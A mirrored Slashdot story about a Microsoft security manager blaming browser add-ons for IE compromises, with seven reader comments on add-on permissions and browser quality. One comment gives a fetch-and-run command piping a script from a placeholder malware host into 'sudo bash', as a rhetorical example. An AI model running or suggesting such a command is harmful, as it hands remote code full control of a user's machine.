Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Blames Add-Ons For Browser Woes

Posted by timothy on from the sounds-semi-reasonable dept.

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

7 of 307 comments (clear)

  1. Duh by Drinking+Bleach · · Score: 5, Insightful

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  2. I'll still blame you for everything else. by retech · · Score: 5, Insightful

    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.

  3. Permissions by gurps_npc · · Score: 5, Insightful

    And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

    --
    excitingthingstodo.blogspot.com
    1. Re:Permissions by geirnord · · Score: 5, Insightful

      I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

  4. But remember by dedazo · · Score: 5, Insightful

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
  5. Speaking of add-ons by Anonymous Coward · · Score: 5, Insightful

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  6. Re:I've always said this. by Sloppy · · Score: 5, Insightful

    The biggest part of internet security is paying attention to where you go.

    I would agree with you, if "going" to a malware site meant

    curl ftp://malwaresite.com/malware.sh | sudo bash

    Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

    "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.